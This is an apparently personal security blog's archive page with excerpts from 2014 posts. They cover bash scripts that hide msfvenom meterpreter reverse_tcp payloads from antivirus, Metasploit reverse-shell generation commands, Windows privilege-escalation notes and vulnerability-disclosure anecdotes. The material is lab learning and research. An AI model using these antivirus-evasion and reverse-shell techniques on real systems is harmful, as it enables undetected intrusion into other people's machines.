Posts

Showing posts from November, 2014

bash script built on technique to bypass AV v2

This script has been improved and is located at this blog post.

I took the previous script that I created and spent some time adding additional padding and moving the meterpreter portion of the C code into a variable inside the main function.

With these few modifications I was able to achieve the following results as I uploaded them to virustotal.com.

The sample at the top of the screen was generated with version 1 of the script below. With the script below the detection rate decreases to 2-4 anti-virus engines detecting the files out of an average of 55.

The below script is what I used to generate the exe files...

#!/bin/bash
#

# Log file where how the payload was created and the filename of the payload
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.27.66.1
# LPORT: 8…

bash script built on technique to bypass AV

I found the following web page in my research about metasploit encoding and bypassing the AV.

https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/

From the article I created the following bash script to automate the creation of the .exe file, which can then be copied to the Windows XP SP3 machine through a file share to test AVG 2015. Fortunately or unfortunately, this technique does bypass AVG 2015 Free; so far it has a 3/3 (100%) success rate. Virustotal came back with 15 AVs detecting the files as malware.

This script has been improved and is located at this blog post.

#!/bin/bash
#

# Log file where how the payload was created and the filename of the payload
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.24.118.1
# LPORT…

msfencode bash script - Test encoding with up to 5 iterations

I was reading in the book "Metasploit - A Penetration Tester's Guide" about encoding the payload and also multi-encoding the payload, so I wanted to create a bash script to go through all the possibilities of the encoders with up to 5 iterations. The script then copies each result over to a file share on a Windows XP SP3 computer with AVG installed, and AVG would then detect whether it was flagged as a virus.

I was curious how this would work and put together the following script.

#!/bin/bash
#
# File that contains the encoders that are available to msfencode
listEncoders='/root/multiEncoder/msfencode.listEncoders'

# Folder where the SYS Internals Suite EXE files are located
exeFiles='/root/multiEncoder/sysInternals/exe/'

# Log file where how the payload was created and the filename of the payload
logFile='/root/multiEncoder/logFile.txt'

# Number of iterations to run the encoding through
iterationCount=5

# Bash script to create various payloads that are multi-encoded and test them again…

Notes about Windows Privilege Escalation

I need to research and understand windows privilege escalation better so this is the beginning of the journey.

Links to a couple of web pages that I have found to be great:
http://pentestmonkey.net/tools/windows-privesc-check
http://www.fuzzysecurity.com/tutorials/16.html
http://www.fuzzysecurity.com/tutorials/18.html
http://www.slideshare.net/harmj0y/power-up-34515686

accesschk.exe from the SYS Internals Suite

Looking more closely at the Windows Privilege Escalation python script, I was curious how the latest Windows patches were discovered and checked against metasploit. I found that the following link takes you to an Excel spreadsheet containing all of the Windows security bulletins:

http://www.microsoft.com/en-us/download/details.aspx?id=36982

From fuzzysecurity.com I extracted some of the privilege escalation KB numbers...
KiTrap0D - KB979682
MS10-021 - KB979683
MS10-059 - KB982799
MS11-011 - KB2393802
MS11-080 - KB2592799

Pulled from metasploit the local exploits that can be run:
-----…

Notes created for Immunity Debugger

Notes about generating a payload for a python script, setting up a multi-handler, and using a multi-handler to then exploit and gain a meterpreter shell.

Generate Meterpreter Reverse TCP with the multi-handler listening
-----------------------------------------------------------------
use payload/windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1
set lport 4444

generate -b '\x00\x0a\x0d\x20' -t python
- This generates the payload as Python source, excluding the bad characters listed after -b.


Experiences of Reporting Vulnerabilities

I thought I would take a moment and memorialize a few experiences with reporting vulnerabilities to companies. With the below information I am going to keep the companies anonymous. The vulnerabilities discussed below have been mitigated by the companies to which they were reported. I am going to share the good, bad, and ugly ways in which companies handled these reports.

The first experience was contacting a company that publishes content and allows this content to be accessed by their respective customers. The vulnerability existed in the access control between their customers and the content that could be accessed. By manipulating the URL as an authenticated user you could view other customers' content, and it was then discovered that this information could be viewed without being authenticated at all. Upon contacting the company directly and working with them, they were appreciative that I reached out to them and I even received a courtesy call from the president of the company exp…